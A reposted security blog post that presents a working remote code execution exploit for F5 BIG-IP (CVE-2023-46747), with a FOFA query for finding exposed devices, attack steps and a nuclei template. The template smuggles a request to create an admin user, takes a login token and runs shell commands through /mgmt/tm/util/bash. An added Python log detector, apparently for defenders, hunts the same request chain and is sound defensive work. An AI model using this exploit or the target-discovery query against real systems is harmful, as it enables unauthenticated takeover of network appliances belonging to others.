F5 BIG-IP RCE(CVE-2023-46747)

admin 2024-02-15 17:54:19

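1. Disclaimer:

      This article is for personal study only; the author bears no relation to any illegal use, so proceed with care. Any direct or indirect consequences and losses caused by spreading or using the information provided by this public account are the sole responsibility of the user; the public account 望雪阁 and the author accept no liability, and you bear any consequences yourself. If anything here infringes your rights, please let us know and we will immediately delete and correct it and apologize. Thank you!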

2. Product introduction:

F5 BIG-IP RCE(CVE-2023-46747)

3. Asset discovery:

fofa: title="BIG-IP" && icon_hash="-335242539"

4. Vulnerability reproduction:

Use request smuggling against the /tmui/Control/form endpoint to invoke user/create.jsp and create a user.

Log in with the account's username and password through the /mgmt/shared/authn/login endpoint to obtain a token.

Execute commands through the /mgmt/tm/util/bash endpoint.

Reverse shell:

5. PoC:

nuclei POC:

id: F5-BIG-IP-CVE-2023-46747-Unauthenticated-AJP-RCE

info:
  name: F5-BIG-IP-CVE-2023-46747-Unauthenticated-AJP-RCE
  author: xxxx
  severity: critical
  description: F5 BIG-IP CVE-2023-46747
  tags: f5,bigip

variables:
  username: "{{hex_encode(rand_base(5))}}"
  password: "{{hex_encode(rand_base(12))}}"
  password2: "{{rand_base(14)}}"

http:
  - raw:
      - |+
        POST /tmui/login.jsp HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chunked, chunked
        Content-Type: application/x-www-form-urlencoded

        204
        {{ hex_decode(concat("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",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
        0

    unsafe: true

  - raw:
      - |+
        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
        Content-Type: application/json

        {"password": "{{password2}}"}

      - |+
        POST /mgmt/shared/authn/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{hex_decode(username)}}", "password":"{{password2}}"}

      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{token}}
        Content-Type: application/json

        {"command":"run","utilCmdArgs":"-c id"}

    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - "([A-Z0-9]{26})"
        internal: true

      - type: regex
        part: body_3
        group: 1
        regex:
          - "\"commandResult\":\"(.*)\""

      - type: dsl
        dsl:
          - '"Username:" + hex_decode(username)'
          - '"Password:" + password2'
          - '"Token:" + token'

    matchers:
      - type: word
        words:
          - "commandResult"
          - "uid="
        condition: and
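
For defenders, the request chain above can be hunted in request logs. The following is an added example, not part of the original post or of the nuclei template: it flags a /tmui/ request whose Transfer-Encoding header repeats `chunked`, then correlates the later /mgmt/ calls from the same source. The JSON-lines log layout (fields `ts`, `src`, `method`, `path`, `te`), the sample records and the 300-second window are assumptions made for illustration.

```python
import json
from collections import defaultdict

# Constructed sample: JSON-lines request log from a reverse proxy in front of the
# management interface. Field names are assumptions, not a BIG-IP log format.
SAMPLE_LOG = """\
{"ts": 100, "src": "198.51.100.7", "method": "POST", "path": "/tmui/login.jsp", "te": "chunked, chunked"}
{"ts": 101, "src": "198.51.100.7", "method": "PATCH", "path": "/mgmt/tm/auth/user/a1b2c3", "te": ""}
{"ts": 102, "src": "198.51.100.7", "method": "POST", "path": "/mgmt/shared/authn/login", "te": ""}
{"ts": 103, "src": "198.51.100.7", "method": "POST", "path": "/mgmt/tm/util/bash", "te": ""}
{"ts": 110, "src": "192.0.2.10", "method": "POST", "path": "/tmui/login.jsp", "te": ""}
{"ts": 400, "src": "192.0.2.20", "method": "POST", "path": "/mgmt/shared/authn/login", "te": ""}
{"ts": 405, "src": "192.0.2.20", "method": "POST", "path": "/mgmt/tm/util/bash", "te": ""}
"""

WINDOW = 300  # seconds; assumed correlation window

def stage(rec):
    """Map one logged request to a stage of the chain on this page, or None."""
    m, p = rec["method"], rec["path"]
    te = [t.strip().lower() for t in rec.get("te", "").split(",") if t.strip()]
    if p.startswith("/tmui/") and te.count("chunked") > 1:
        return "smuggle"
    if m == "PATCH" and p.startswith("/mgmt/tm/auth/user/"):
        return "user_change"
    if m == "POST" and p == "/mgmt/shared/authn/login":
        return "token_login"
    if m == "POST" and p == "/mgmt/tm/util/bash":
        return "bash"
    return None

def detect(log_text, window=WINDOW):
    """Return {src: [stages]}; later stages count only within `window` of a smuggle hit."""
    smuggle_ts, alerts = {}, defaultdict(list)
    for line in log_text.splitlines():  # records are assumed to be in time order
        rec = json.loads(line)
        st = stage(rec)
        if st == "smuggle":
            smuggle_ts[rec["src"]] = rec["ts"]
            alerts[rec["src"]].append("smuggle")
        elif st and rec["src"] in smuggle_ts and rec["ts"] - smuggle_ts[rec["src"]] <= window:
            alerts[rec["src"]].append(st)
    return dict(alerts)

if __name__ == "__main__":
    for src, hits in detect(SAMPLE_LOG).items():
        print(src, "->", hits)
```

In the template above the user-creation data travels inside the body of the /tmui/login.jsp request, so a log of request lines shows only that one entry for the first stage; the repeated `chunked` token is what distinguishes it from an ordinary login POST.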

Originally published on the WeChat official account fly的渗透学习笔记: F5 BIG-IP RCE(CVE-2023-46747)

When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work): F5 BIG-IP RCE(CVE-2023-46747) https://cn-sec.com/archives/2190109.html